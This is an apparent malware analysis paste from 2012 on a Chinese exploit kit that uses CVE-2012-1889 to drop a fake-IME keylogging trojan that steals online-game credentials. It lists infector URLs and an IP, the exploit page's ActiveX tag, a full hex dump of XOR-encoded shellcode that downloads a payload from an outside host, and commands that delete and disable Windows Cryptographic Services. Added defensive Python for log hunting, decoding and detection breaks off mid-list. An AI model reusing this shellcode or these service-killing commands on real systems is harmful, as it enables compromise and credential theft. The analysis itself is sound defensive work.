unixfreaxjp

Chinese ExploitKit/CVE-2012-1889| FakeIME InfoStealer Trojan

Sep 29th, 2012

* * Chinese ExploitKit/CVE-2012-1889| FakeIME InfoStealer Trojan * *
================================
CHINESE FAKE IME INFECTIONS
DROPS ITS OWN net1.exe ("FAKE NET") AND USES IT TO STOP SERVICES
DISABLES WINDOWS CRYPTOGRAPHIC SERVICES (cryptsvc)
INFO STEALER (online-game credentials; AV names it PSW.OnLineGames / Lolyda, strings point at the Kingsoft JX3 client)
Found/analysis:
#MalwareMustDie / @unixfreaxjp
================================
Note: URLs in this paste are defanged (h00p = http).
-----------
Infector IP:
-----------
IP: 222.73.57.117
inetnum: 222.64.0.0 - 222.73.255.255
netname: CHINANET-SH
descr: CHINANET shanghai province network
descr: China Telecom
descr: No1,jin-rong Street
descr: Beijing 100032
country: CN
-----------
Info:
-----------
person: Wu Xiao Li
address: Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
country: CN
phone: +86-21-63630562
fax-no: +86-21-63630566
nic-hdl: XI5-AP
mnt-by: MAINT-CHINANET-SH
changed: [email protected] 20010510
source: APNIC
-----------
Infector urls:
-----------
h00p://9be14ngfsd.pppdiy.com/jx/xop.html
h00p://9f515lzff3.pppdiy.com/xy/xop.html
h00p://9kpgfwqdrj.pppdiy.com/hx/xop.html
h00p://9mf9x3cl55.pppdiy.com/tl/xop.html
h00p://9spxqc71fa.pppdiy.com/jy/xop.html
h00p://s35fc3qiyl.pppdiy.com/wd/xop.html
h00p://s3ebb5z4sk.pppdiy.com/wd/xop.html
h00p://s52csz5u47.pppdiy.com/wd/xop.html
h00p://s5c2ouavle.pppdiy.com/ny/xop.html
h00p://s9inw8nkk9.pppdiy.com/yl/xop.html
h00p://74jjdqugds.pppdiy.com/zt/xop.html
h00p://75kay4lxj8.pppdiy.com/jy/xop.html
h00p://67ldbpbmmj.pppdiy.com/jy/xop.html
h00p://rq2e9k4ti8.pppdiy.com/xy/xop.html
h00p://rre11swub9.pppdiy.com/yh/xop.html
h00p://436p1bwt5s.pppdiy.com/wd/xop.html
h00p://4a41nvbsst.pppdiy.com/tl/xop.html
h00p://4bo1ocjpk9.pppdiy.com/wm/xop.html
h00p://4eb2c9aupa.pppdiy.com/hx/xop.html
h00p://4ekyz6afnh.pppdiy.com/jy/xop.html
h00p://4gjoqgnvym.pppdiy.com/jy/xop.html
h00p://4j4yxxyugh.pppdiy.com/wd/xop.html
h00p://4s2aqluitq.pppdiy.com/yl/xop.html
h00p://52jbsoqe53.pppdiy.com/ah/xop.html
h00p://rkiit9hy1a.pppdiy.com/zt/xop.html
h00p://rldq7secto.pppdiy.com/jy/xop.html
h00p://roapzl6ao6.pppdiy.com/yl/xop.html
h00p://rohws731yt.pppdiy.com/tl/xop.html
h00p://3q4cnllxe2.pppdiy.com/yl/xop.html
h00p://2e1t8v8z9v.pppdiy.com/zt/xop.html
h00p://2kqi7tk2tx.pppdiy.com/wd/xop.html
h00p://2nzysx8qfy.pppdiy.com/xy/xop.html
h00p://2pg54c2ay2.pppdiy.com/ty/xop.html
h00p://2tvypppa1t.pppdiy.com/jx/xop.html
h00p://2zaco8gjga.pppdiy.com/xy/xop.html
h00p://31fclefhp5.pppdiy.com/jy/xop.html
h00p://37fs5qo4q5.pppdiy.com/jy/xop.html
h00p://3p3sivfs1w.pppdiy.com/jy/xop.html
h00p://rceta3uznz.pppdiy.com/xy/xop.html
h00p://11a1tgjoav.pppdiy.com/wd/xop.html
h00p://quyi6g8jz8.pppdiy.com/zt/xop.html
h00p://r7ykgk31xl.pppdiy.com/ny/xop.html
h00p://r89i2jzv72.pppdiy.com/ah/xop.html
h00p://r8cvnadv11.pppdiy.com/jx/xop.html
h00p://r8v7by8hl7.pppdiy.com/wm/xop.html
h00p://r9mdp167ou.pppdiy.com/xy/xop.html
h00p://ra5dfl2dhp.pppdiy.com/tl/xop.html
h00p://q4u427a9d9.pppdiy.com/wl/xop.html
h00p://qbfjz6vs2b.pppdiy.com/ty/xop.html
h00p://qfckl9xclm.pppdiy.com/xy/xop.html
h00p://qoxvbbwxxv.pppdiy.com/jy/xop.html
h00p://qpm2jb8vds.pppdiy.com/xy/xop.html
h00p://qrbvhfpnfi.pppdiy.com/my/xop.html
h00p://qtxjsy4psn.pppdiy.com/wd/xop.html
h00p://ppmcnqlq4b.pppdiy.com/hx/xop.html
h00p://pnj1c3glru.pppdiy.com/wd/xop.html
h00p://pnrks68rrs.pppdiy.com/wd/xop.html
h00p://pn87z1eiaj.pppdiy.com/yl/xop.html
h00p://pcsssued3v.pppdiy.com/tl/xop.html
h00p://p2rb4o7xo3.pppdiy.com/ty/xop.html
h00p://p444fcmod8.pppdiy.com/jy/xop.html
h00p://oy3eewl8dj.pppdiy.com/wm/xop.html
h00p://z1v1awk14w.pppdiy.com/zx/xop.html
h00p://zlpr6v2wdp.pppdiy.com/wd/xop.html
h00p://zrxodxxsdb.pppdiy.com/jy/xop.html
h00p://x82ndlgusg.pppdiy.com/xy/xop.html
h00p://xgbex2gqur.pppdiy.com/wd/xop.html
h00p://xinfejn8sh.pppdiy.com/yh/xop.html
h00p://ypqdgh1spm.pppdiy.com/zx/xop.html
h00p://yzua8al89b.pppdiy.com/wd/index.ht
h00p://u3gltdtoo4.pppdiy.com/jy/xop.html
h00p://vev8ncrkcm.pppdiy.com/jx/xop.html
h00p://vlbujx6d19.pppdiy.com/xy/xop.html
h00p://vouludav9m.pppdiy.com/wd/xop.html
h00p://vqouin8qdg.pppdiy.com/wd/xop.html
h00p://wjjxh168lj.pppdiy.com/wd/index.ht
h00p://ssx2pc47nw.pppdiy.com/ty/xop.html
h00p://sw29diefib.pppdiy.com/wd/xop.html
h00p://t1zsxal6p5.pppdiy.com/ty/xop.html
h00p://pq58ow6ydk.pppdiy.com/yl/xop.html
h00p://rlcensq6ds.pppdiy.com/wd/xop.html
h00p://s9ms36eb5q.pppdiy.com/ah/xop.html
h00p://p8t89f1q3x.pppdiy.com/xy/xop.html
h00p://pcsir3ijj9.pppdiy.com/zt/xop.html
h00p://pjv68ibarl.pppdiy.com/ah/xop.html
h00p://ow858ymp4d.pppdiy.com/xx/xop.html
h00p://opu3mx9u8s.pppdiy.com/tl/xop.html
h00p://o1v1ia7fzp.pppdiy.com/ah/xop.html
h00p://nq9k8bhtgy.pppdiy.com/tl/xop.html
h00p://mj3aqytgna.pppdiy.com/wd/xop.html
h00p://mkjbyf6vr8.pppdiy.com/xy/xop.html
h00p://lsjq1ic827.pppdiy.com/zt/xop.html
h00p://ln9jwxhwp2.pppdiy.com/jy/xop.html
h00p://kltudl7ixd.pppdiy.com/wd/xop.html
h00p://kb8ngrsrkt.pppdiy.com/zx/xop.html
h00p://ki9hfgy8eb.pppdiy.com/wd/index.ht
h00p://jqqm6ksd4u.pppdiy.com/jx/xop.html
h00p://joez462a36.pppdiy.com/xy/xop.html
h00p://ir1mxyqbe1.pppdiy.com/jy/xop.html
h00p://hrwvzspefk.pppdiy.com/my/xop.html
h00p://hwwlnwoh5u.pppdiy.com/jx/xop.html
h00p://hehqxbhtrr.pppdiy.com/xy/xop.html
h00p://gzfuswbru9.pppdiy.com/xy/xop.html
h00p://gur1nihj4g.pppdiy.com/wd/xop.html
h00p://gcrbfl8iyi.pppdiy.com/jx/xop.html
h00p://fs12vmyw85.pppdiy.com/wd/xop.html
h00p://fs9kdc75dk.pppdiy.com/jy/xop.html
h00p://dxonfcd1zh.pppdiy.com/zt/xop.html
h00p://dfmta9juu5.pppdiy.com/ah/xop.html
h00p://di6uj6rqk3.pppdiy.com/jy/xop.html
h00p://85qcnilv1k.pppdiy.com/my/xop.html
h00p://9fnq4ekiqd.pppdiy.com/wd/index.ht
h00p://4oy56fcvmg.pppdiy.com/jy/xop.html
h00p://x7zzmg5b1v.pppdiy.com/jx/xop.html
h00p://zgxx2raoak.pppdiy.com/jx/xop.html
h00p://wxf3mzd3zn.pppdiy.com/jx/xop.html
h00p://wzrkh2m8xl.pppdiy.com/xx/xop.html
h00p://uc18awkxod.pppdiy.com/my/xop.html
h00p://v2229jswhx.pppdiy.com/wd/xop.html
h00p://pxkxilbpos.pppdiy.com/wm/xop.html
h00p://rakwmwhpve.pppdiy.com/xy/xop.html
h00p://nsqjxjbfcs.pppdiy.com/ah/xop.html
h00p://ny5iceirim.pppdiy.com/jx/xop.html
h00p://iz5lh4r5qi.pppdiy.com/yl/xop.html
h00p://agz5utxh9u.pppdiy.com/wd/index.ht
h00p://4fp9g7s3tr.pppdiy.com/xy/xop.html
h00p://57vcqwfb8a.pppdiy.com/jy/xop.html
h00p://oqlpdxtgux.pppdiy.com/zt/xop.html
h00p://ocd1bm7coa.pppdiy.com/xy/xop.html
h00p://od5aaz7m5e.pppdiy.com/jx/xop.html
h00p://odvn3j955e.pppdiy.com/zx/xop.html
h00p://ogd48fw2lt.pppdiy.com/tl/xop.html
h00p://oixgmmsng1.pppdiy.com/xy/xop.html
h00p://ntuhp4ou1t.pppdiy.com/yl/xop.html
h00p://oaicu6zotz.pppdiy.com/zt/xop.html
h00p://oannucq891.pppdiy.com/jx/xop.html
h00p://nmwlyg9jtd.pppdiy.com/xy/xop.html
h00p://nkkprh379v.pppdiy.com/wd/index.ht
h00p://nf8ri2a2ah.pppdiy.com/zt/xop.html
h00p://myx7rlgfgz.pppdiy.com/yl/xop.html
h00p://mzjqths79w.pppdiy.com/yl/xop.html
h00p://n19yfqnfgx.pppdiy.com/jy/xop.html
h00p://n318aq72eb.pppdiy.com/jy/xop.html
h00p://n3zxb481z3.pppdiy.com/yh/xop.html
h00p://n8dx15kr7y.pppdiy.com/xy/xop.html
h00p://muy6w1ufrw.pppdiy.com/jx/xop.html
h00p://mvhnrd8c9o.pppdiy.com/jy/xop.html
h00p://mvzn8qs8lg.pppdiy.com/wd/xop.html
h00p://mu5dptjoda.pppdiy.com/xy/xop.html
h00p://msogw56yis.pppdiy.com/xy/xop.html
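The 150 landing URLs above all share one shape: a ten-character [a-z0-9] label under pppdiy.com, a two-letter directory, and either xop.html or index.ht. Added example, not part of the original paste: a Python script that derives a single regex from a subset of the list (refanged, h00p -> http) and runs it, together with a pattern for the second-stage download from 222.73.57.117/exe/, over constructed Squid access.log lines. The log lines, the client IPs and the extra host k1h2j3k4l5.pppdiy.com are made up for the example; generalising the payload name to any .exe under /exe/ on that IP is an assumption.

```python
import re
from urllib.parse import urlsplit

# Subset of the infector URLs listed above, refanged (h00p -> http).
INFECTOR_URLS = [
    "http://9be14ngfsd.pppdiy.com/jx/xop.html",
    "http://s35fc3qiyl.pppdiy.com/wd/xop.html",
    "http://yzua8al89b.pppdiy.com/wd/index.ht",
    "http://q4u427a9d9.pppdiy.com/wl/xop.html",
    "http://msogw56yis.pppdiy.com/xy/xop.html",
]

# Second stage seen in the decoded shellcode: http://222.73.57.117/exe/jx.exe.
# Assumption for the example: any .exe under /exe/ on that host is the payload.
PAYLOAD_RE = re.compile(r"^https?://222\.73\.57\.117/exe/[^/]+\.exe$")


def landing_pattern(urls):
    """Generalise the listed landing URLs into one regex.

    Every listed URL is <10 random [a-z0-9] chars>.pppdiy.com/<2 letters>/<file>;
    the label and directory are wildcarded, the parent domain and the set of
    observed filenames stay literal.  Raises if a URL breaks the shape, so a
    bad generalisation fails loudly instead of silently widening the match.
    """
    parents, files = set(), set()
    for u in urls:
        parts = urlsplit(u)
        label, _, parent = parts.hostname.partition(".")
        if not re.fullmatch(r"[a-z0-9]{10}", label):
            raise ValueError(f"unexpected host label in {u}")
        directory, filename = parts.path.strip("/").split("/")
        if not re.fullmatch(r"[a-z]{2}", directory):
            raise ValueError(f"unexpected directory in {u}")
        parents.add(parent)
        files.add(filename)
    if len(parents) != 1:
        raise ValueError(f"more than one parent domain: {sorted(parents)}")
    alts = "|".join(re.escape(f) for f in sorted(files))
    return re.compile(
        rf"^https?://[a-z0-9]{{10}}\.{re.escape(parents.pop())}/[a-z]{{2}}/(?:{alts})$"
    )


def hunt(log_lines, landing_re, payload_re=PAYLOAD_RE):
    """Return (client, stage, url) for every Squid-style access.log line that hits."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        client, url = fields[2], fields[6]   # native format: ts elapsed client action size method url ...
        if landing_re.match(url):
            hits.append((client, "landing", url))
        elif payload_re.match(url):
            hits.append((client, "payload", url))
    return hits


# Constructed Squid native-format access.log lines (not from the page).  The
# host k1h2j3k4l5.pppdiy.com is not in the list above; the pattern still
# catches it because only the shape of the URL is matched.
SAMPLE_LOG = [
    "1348886000.123    512 10.0.0.15 TCP_MISS/200 9950 GET http://9be14ngfsd.pppdiy.com/jx/xop.html - DIRECT/222.73.57.117 text/html",
    "1348886005.456   1400 10.0.0.15 TCP_MISS/200 48128 GET http://222.73.57.117/exe/jx.exe - DIRECT/222.73.57.117 application/octet-stream",
    "1348886010.000    200 10.0.0.22 TCP_MISS/200 1200 GET http://www.example.com/index.html - DIRECT/93.184.216.34 text/html",
    "1348886020.000    300 10.0.0.31 TCP_MISS/200 9950 GET http://k1h2j3k4l5.pppdiy.com/ah/xop.html - DIRECT/222.73.57.117 text/html",
]

if __name__ == "__main__":
    landing_re = landing_pattern(INFECTOR_URLS)
    print(landing_re.pattern)
    for hit in hunt(SAMPLE_LOG, landing_re):
        print(*hit)
```

A client that shows a "landing" hit followed by a "payload" hit from the same IP (10.0.0.15 in the sample) is the one to pull for the host-side artifacts listed further down.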

======================
ANALYSIS
======================
--02:53:10-- h00p://9be14ngfsd.pppdiy.com/jx/xop.html
=> `xop.html'
Resolving 9be14ngfsd.pppdiy.com... 222.73.57.117
Connecting to 9be14ngfsd.pppdiy.com|222.73.57.117|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,950 (9.7K) [text/html]
02:53:15 (2.74 KB/s) - `xop.html' saved [9950/9950]

-----------------------------

[http] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
// ActiveX : f6d90f11-9c73-11d3-b32e-00c04f990bb4 Dropped..
// CLSID {F6D90F11-9C73-11D3-B32E-00C04F990BB4} is Microsoft.XMLDOM (the MSXML 3.0
// DOMDocument); its uninitialized-memory bug is CVE-2012-1889. The X-UA-Compatible
// meta pins IE to IE7 document mode, a common exploit-kit trick for heap-spray reliability.
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
<meta content="IE=7" http-equiv="X-UA-Compatible"/>
------------shellcode executed------------------

58 58 58 58 eb 10 5b 4b 33 c9 66 b9 b8 03 80 34 // CVE-2012-1889
0b bd e2 fa eb 05 e8 eb ff ff ff 54 a3 be bd bd
e2 d9 1c 8d bd bd bd 36 fd b1 36 cd a1 10 36 d5
b5 36 4a d7 ac e4 55 03 bf bd bd 2d 5f 45 d5 8e
8f bd bd d5 e8 ce d8 cf e9 36 fb b1 55 03 bc bd
bd 36 55 d7 b8 e4 55 23 bf bd bd 5f 44 d5 d2 d3
bd bd d5 c8 cf d1 d0 e9 42 ab 38 7d c8 ae d5 d2
d3 bd bd d5 c8 cf d1 d0 e9 36 fb b1 55 33 bc bd
bd 36 55 d7 bc e4 55 d3 bf bd bd 5f 44 d5 d1 8e
8f bd d5 ce d5 d8 d1 e9 36 fb b1 55 d2 bc bd bd
36 55 d7 bc e4 55 f2 bf bd bd 5f 44 3c 51 bd bc
bd bd 36 61 3c 7e 3d bd bd bd d7 bd d7 a7 ee d7
bd 42 eb e1 8e 7d fd 3d 81 be bd c8 44 7a b9 be
e1 fa 93 d8 7a f9 be b9 c5 d8 bd bd 8e 74 ec ec
ee ea ec 8e 7d 36 fb e5 55 9f bc bd bd 3e 45 bd
54 1e bd bd bd 2d d7 bd d7 bd d7 be d7 bd d7 bf
d5 bd bd bd 7d ee 36 fb 99 55 bc bc bd bd 34 fb
dd d7 bd ed 42 eb 95 34 fb d9 36 fb dd d7 bd d7
bd d7 bd d7 b9 d7 bd ed 42 eb 91 d7 bd d7 bd d7
bd d5 a2 bd b2 bd ed 42 eb 81 34 fb c5 36 f3 d9
3d c1 b5 42 09 c9 b1 3d c1 b5 42 bd c9 b8 3d c9
b5 42 09 5f 56 34 3b 3d bd bd bd 7a fb cd bd bd
bd bd 7a fb c9 bd bd bd bd d7 bd d7 bd d7 bd 36
fb dd ed 42 eb 85 36 3b 3d bd bd bd d7 bd 30 f3
c9 ec 42 cb cd ed 42 cb dd 42 eb 8d 42 cb dd 42
eb 89 42 cb c5 42 eb fd 36 46 8e 7d 8e 66 3c 51
bd bf bd bd 36 71 3e 45 e9 c0 b5 34 a1 bc 3e 7d
b9 56 4e 36 71 36 64 3e 7e ad 8e 7d ed ec ee ed
ed ed ed ed ed ea ed ed 42 eb b5 36 c3 e9 55 ad
bc bd bd 55 d8 bd bd bd d5 de cb ca bd d5 ce d5
d9 d2 e9 36 fb b1 55 99 bd bd bd 34 fb 81 d9 1c
b9 bd bd bd 30 1d dd 42 42 42 d7 d8 42 cb 81 36
fb ad 55 b5 bd bd bd 8e 66 ee ee ee ee 42 6d 3d
85 55 3d 85 54 c8 ac 3c c5 b8 2d 2d 2d 2d c9 b5
36 42 e8 36 51 30 fd b8 42 5d 55 1b bd bd bd 7e
55 1d bd bd bd 05 ac bc b9 3d 7f b1 bd 55 2e bd
bd bd 3c 51 bd bc bd bd 36 41 3e 7a b9 7a ba 8f
c9 2c b1 7a fa b9 de 34 6c f2 7a fa b5 1d d8 2a
76 7a fa b1 ec fd 07 c2 7a fa ad 83 a0 0b 84 7a
fa a9 05 d4 69 a6 7a fa a5 03 c2 db 1d 7a fa a1
41 14 8a 10 7a fa 9d 25 b7 ad 45 d9 1c 8d bd bd
bd 36 fd b1 36 cd a1 10 36 d5 b5 36 4a d7 b9 e4
55 e9 bd bd bd 2d 5f 45 d5 8e 8f bd bd d5 e8 ce
d8 cf e9 36 bb 55 e8 42 42 42 36 55 d7 b8 e4 55
88 bd bd bd 5f 44 8e 42 ea 42 eb b9 56 bf e5 7e
55 44 42 42 42 e6 7b ba 05 34 e2 bc db 7a fa b8
42 5d 7e ee 36 61 ee d7 fd d5 bd ad bd bd ea 36
fb 9d 55 a5 42 42 42 e5 7e ec eb 36 c8 81 36 c9
93 c5 be 48 eb 36 cb 9d be 48 8e 74 f4 fc 10 be
78 8e 66 b2 03 ad 87 6b c9 b5 7c 76 ba be 67 fd
56 4c 86 a2 c8 5a e3 36 e3 99 be 60 db 36 b1 f6
36 e3 a1 be 60 36 b9 36 be 78 16 e3 e4 7e 55 60
41 42 42 0f 4f 5f 49 84 5f c0 3e 67 f5 c6 80 8f
c9 2c b1 38 62 12 06 de 34 6c f2 ec fd 07 c2 1d
d8 2a 76 a3 19 d9 52 2e 8f 59 29 33 ae b7 11 7f
a4 f6 bc 79 30 a2 c9 ea db b0 42 fe 03 11 66 c0
4d 18 27 ef 43 1a 67 83 a0 0b 84 05 d4 69 a6 03
c2 db 1d 41 14 8a 10 25 b7 ad 45 3d 6b 12 27 46
ee a8 db d5 c9 c9 cd 87 92 92 8f 8f 8f 93 8a 8e
93 88 8a 93 8c 8c 8a 92 d8 c5 d8 92 d7 c5 93 d8
c5 d8 bd bd bd bd bd bd bd bd bd bd bd bd bd bd
bd bd bd bd bd bd ea ea

↑ The blob is XOR-encoded with a single-byte key; the first 27 bytes are the decoder:
  58 58 58 58           pop eax (x4)
  eb 10                 jmp short -> the call below
  5b 4b                 pop ebx / dec ebx            ; ebx = start of encoded data - 1
  33 c9 66 b9 b8 03     xor ecx,ecx / mov cx,0x3b8   ; 952 bytes to decode
  80 34 0b bd           xor byte [ebx+ecx], 0xbd     ; key = 0xbd
  e2 fa                 loop
  eb 05                 jmp short -> decoded payload
  e8 eb ff ff ff        call -> pop ebx (GetPC)
XOR with 0xbd turns the rest into a standard PEB-walk API resolver (64 a1 30 00 00 00 = mov eax, fs:[0x30]) and, near the end, the download URL h00p://222.73.57.117/exe/jx.exe // path found;
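Added example, not part of the original paste: a Python re-implementation of the decoding step above, which reads the key (0xbd) and the byte count (0x3b8) out of the decoder stub instead of assuming them, XORs the payload, and pulls out the URL and the PEB-walk marker. The embedded bytes are an excerpt of the dump above (the stub, the first 37 encoded bytes and the last 56); the 864 bytes in between are omitted, so the decoder clamps the count to what it has, which also means the last five bytes (outside the real loop's range in the full dump) get XORed here although the stub leaves them alone.

```python
import re
import struct

# Excerpt of the hex dump above, constructed for this example: the 27-byte
# decoder stub, the next 37 encoded bytes, and the final 56 bytes.  The 864
# bytes in between are omitted, so the counter in the stub (0x3b8) is larger
# than the excerpt; decode_shellcode() clamps to what is available.
SHELLCODE_EXCERPT = bytes.fromhex(
    "58 58 58 58 eb 10 5b 4b 33 c9 66 b9 b8 03 80 34 "
    "0b bd e2 fa eb 05 e8 eb ff ff ff 54 a3 be bd bd "
    "e2 d9 1c 8d bd bd bd 36 fd b1 36 cd a1 10 36 d5 "
    "b5 36 4a d7 ac e4 55 03 bf bd bd 2d 5f 45 d5 8e "
    # ... 864 bytes omitted (see the full dump above) ...
    "ee a8 db d5 c9 c9 cd 87 92 92 8f 8f 8f 93 8a 8e "
    "93 88 8a 93 8c 8c 8a 92 d8 c5 d8 92 d7 c5 93 d8 "
    "c5 d8 bd bd bd bd bd bd bd bd bd bd bd bd bd bd "
    "bd bd bd bd bd bd ea ea"
)

XOR_EBX_ECX_IMM8 = b"\x80\x34\x0b"   # xor byte ptr [ebx+ecx], imm8
MOV_CX_IMM16 = b"\x66\xb9"           # mov cx, imm16
CALL_REL32 = b"\xe8"                 # the GetPC call; ebx = (address after it) - 1
PEB_WALK = bytes.fromhex("64 a1 30 00 00 00")  # mov eax, fs:[0x30]


def parse_decoder_stub(blob: bytes):
    """Read (key, byte_count, payload_offset) out of the XOR decoder stub.

    The loop is `xor byte [ebx+ecx], key; loop` with ecx preloaded by
    `mov cx, imm16` and ebx pointing one byte before the encoded data, so the
    payload starts right after the GetPC call and is `count` bytes long.
    """
    x = blob.find(XOR_EBX_ECX_IMM8)
    if x < 0:
        raise ValueError("no 'xor byte [ebx+ecx], imm8' found")
    key = blob[x + 3]
    m = blob.rfind(MOV_CX_IMM16, 0, x)
    if m < 0:
        raise ValueError("no 'mov cx, imm16' before the xor loop")
    count = struct.unpack_from("<H", blob, m + 2)[0]
    c = blob.find(CALL_REL32, x)
    if c < 0:
        raise ValueError("no GetPC call after the xor loop")
    return key, count, c + 5


def decode_shellcode(blob: bytes) -> bytes:
    """Apply the stub's XOR to the payload region; bytes outside it are untouched."""
    key, count, start = parse_decoder_stub(blob)
    end = min(start + count, len(blob))
    return blob[:start] + bytes(b ^ key for b in blob[start:end]) + blob[end:]


def extract_urls(data: bytes):
    """Printable http(s) URLs in the decoded payload (the NUL after them ends the match)."""
    return [m.decode("ascii") for m in re.findall(rb"https?://[\x21-\x7e]+", data)]


def find_peb_walk(data: bytes) -> int:
    """Offset of `mov eax, fs:[0x30]`, the usual opening of a PEB-walk API resolver."""
    return data.find(PEB_WALK)


if __name__ == "__main__":
    key, count, start = parse_decoder_stub(SHELLCODE_EXCERPT)
    print(f"key=0x{key:02x} count={count} payload_offset={start}")
    decoded = decode_shellcode(SHELLCODE_EXCERPT)
    print("PEB walk at decoded offset", find_peb_walk(decoded))
    print("URLs:", extract_urls(decoded))
```

Feeding the full 984-byte dump to decode_shellcode() instead of the excerpt gives the complete decoded payload; the same three functions then work unchanged, because the key and length come from the stub and not from the caller.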


-------------------------------
--03:01:26-- h00p://222.73.57.117/exe/jx.exe <===== TROJAN FAKE IME KEYLOGGING....
=> `jx.exe'
Connecting to 222.73.57.117:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 48,128 (47K) [application/octet-stream]
------------------------------------

Sections (name, virtual address, virtual size, raw size):
UPX0 0x1000 0x7000 0 <<<<<<< PACKED!!
UPX1 0x8000 0xc000 46592 <<<<<<< PACKED!!
UPX2 0x14000 0x1000 512 <<<<<<< PACKED!!


//unpacking with stock upx -d (headers unmodified, so it just works).....
UPX 3.07 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 08th 2010
File size Ratio Format Name
------------------ ------ ----------- -----------
58880 <- 48128 81.74% win32/pe sample
Unpacked 1 file.

-------bin analysis------

Fail CRC: Claimed: 0 Actual: 60344 // PE checksum field left at 0 (unset)
Fail Compile Time: 2033-11-12 07:06:07 // PE timestamp lies in the future: forged or garbage
Compiler: Microsoft Visual C++ v6.0

// process enumeration (Toolhelp32 snapshot walk), strange for something posing as an IME....
0x40402c CreateToolhelp32Snapshot
0x404054 Process32First
0x404080 Process32Next

// Name reference after the two calls. JX3Client.exe is the Kingsoft JX3 Online game client
// (cf. the SOFTWARE\kingsoft\JX3 key below); the author reads this as the sample renaming itself....
call sub_40161C
call sub_401693
mov ebx, offset aJx3client_exe ; "JX3Client.exe"


--------------traces---------

// Malware OP traces (file offset / VA / string)...

000000002FE6 0000004047E6 0 MoveFileA
000000003032 000000404832 0 WriteFile
00000000303E 00000040483E 0 CreateFileA
00000000304C 00000040484C 0 WinExec
000000003074 000000404874 0 CopyFileA

// keyboard-layout APIs (used to register and activate the fake IME)...

0000000030C0 0000004048C0 0 GetKeyboardLayoutList
0000000030D8 0000004048D8 0 GetKeyboardLayoutNameA
0000000030F2 0000004048F2 0 ActivateKeyboardLayout
00000000310C 00000040490C 0 GetKeyboardLayout
000000003120 000000404920 0 LoadKeyboardLayoutA
000000003136 000000404936 0 UnloadKeyboardLayout

// IME traces (ImmInstallIMEA installs its own IME, which then sees every keystroke typed)...

IMM32.dll.ImmGetDescriptionA Hint[0]
IMM32.dll.ImmInstallIMEA Hint[0]
IMM32.dll.ImmIsIME Hint[0]

// temp file paths in the Recycle Bin (%c = drive letter, %d = number)

00000000380C 00000040520C 0 %c:\Recycled\%d.tmp
000000003820 000000405220 0 %c:\RECYCLER\%d.tmp

// Windows Cryptographic Services (cryptsvc) is deleted, disabled and stopped..
00000000E05C 00000040FA5C 0 sc delete cryptsvc
00000000E070 00000040FA70 0 sc config cryptsvc start= disabled
00000000E094 00000040FA94 0 net stop cryptsvc

//registry added traces

00000000E0A8 00000040FAA8 0 %s%s%d.dll // kbdus.dll
00000000E0DC 00000040FADC 0 SOFTWARE\kingsoft\JX3\zhcn
00000000E0F8 00000040FAF8 0 JX3Client // JX3Client.exe
00000000E104 00000040FB04 0 Software\Microsoft\Windows\ShellNoRoam\MUICache
00000000E134 00000040FB34 0 %sdllcache\%s
00000000E144 00000040FB44 0 %syu%s // presumably builds the name of the dropped yumidimap.dll (see Drops)


//Drops
C:\WINDOWS\system32\chinasougou.ime
C:\WINDOWS\system32\yumidimap.dll
C:\WINDOWS\system32\net1.exe


//Malware service control (the net1.exe listed under Drops)...
Filename: net1.exe
MD5: 3f14c041342e3fba343f2a1d11e74bba
SHA-1: 4221467faee4926d692bd5ae71cf0a37f326bf42
File Size: 124928 Bytes
Command Line: net1 stop cryptsvc

//Cryptographic Services disabled via sc.exe:
Filename: sc.exe
MD5: a48b1c06219a01a60cd8d4d45440bde9
SHA-1: 34af23607ad5afa9e61b6a96cec811e6bdc50b4a
File Size: 31232 Bytes
Command Line: sc config cryptsvc start= disabled

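The service tampering above (sc delete / sc config start= disabled / net1 stop, all against cryptsvc, the Windows Cryptographic Services) is easy to hunt for in process-creation telemetry. Added example, not from the paste: a Python detector that normalises sc/net/net1 command lines (full image paths, quoted tokens, start= with or without the space), flags stop/disable/delete of a watched service and, separately, any image whose MD5 equals the dropped net1.exe hash listed above. The event records are constructed in the Sysmon Event ID 1 style (image, command line, parent, hash); the parent path C:\Recycled\2891.tmp follows the %c:\Recycled\%d.tmp template from the strings but is invented, the sc.exe hash is the one from the page, and the cmd.exe / spooler entries are benign controls.

```python
import ntpath

# Service the sample kills (from the strings and process records above).
# Assumption: the set is meant to be extended with other security-relevant
# services; only cryptsvc is attested by the page.
WATCHED_SERVICES = {"cryptsvc"}
# MD5 of the net1.exe the sample drops into system32 (from the analysis above).
DROPPED_NET1_MD5 = "3f14c041342e3fba343f2a1d11e74bba"


def parse_service_command(cmdline: str):
    """Return (tool, action, service) for sc/net commands that stop, disable or
    delete a service; None for anything else (queries, starts, other tools).
    Handles full image paths, quoted tokens and 'start= disabled' with or
    without the space after '='."""
    toks = [t.strip('"') for t in cmdline.lower().split()]
    if len(toks) < 3:
        return None
    tool = ntpath.basename(toks[0])
    tool = tool[:-4] if tool.endswith(".exe") else tool
    if tool == "sc":
        verb, svc, rest = toks[1], toks[2], "".join(toks[3:])
        if verb in ("delete", "stop"):
            return (tool, verb, svc)
        if verb == "config" and rest.startswith("start=disabled"):
            return (tool, "disable", svc)
        return None
    if tool in ("net", "net1") and toks[1] == "stop":
        return (tool, "stop", toks[2])
    return None


def hunt(events):
    """events: dicts with 'image', 'cmd', 'parent', 'md5' (Sysmon EID 1 style).
    Returns one alert per event that tampers with a watched service or whose
    image hash matches the dropped net1.exe."""
    alerts = []
    for ev in events:
        reasons = []
        parsed = parse_service_command(ev["cmd"])
        if parsed and parsed[2] in WATCHED_SERVICES:
            reasons.append(f"{parsed[0]} {parsed[1]} {parsed[2]}")
        if ev.get("md5", "").lower() == DROPPED_NET1_MD5:
            reasons.append("image hash matches the dropped net1.exe")
        if reasons:
            alerts.append({"parent": ev["parent"], "cmd": ev["cmd"],
                           "service": parsed[2] if parsed else None,
                           "reasons": reasons})
    return alerts


# Constructed events (not from the page); the parent path follows the
# %c:\Recycled\%d.tmp template seen in the strings but the number is invented.
SAMPLE_EVENTS = [
    {"image": r"C:\WINDOWS\system32\sc.exe", "cmd": "sc delete cryptsvc",
     "parent": r"C:\Recycled\2891.tmp", "md5": "a48b1c06219a01a60cd8d4d45440bde9"},
    {"image": r"C:\WINDOWS\system32\sc.exe", "cmd": "sc config cryptsvc start= disabled",
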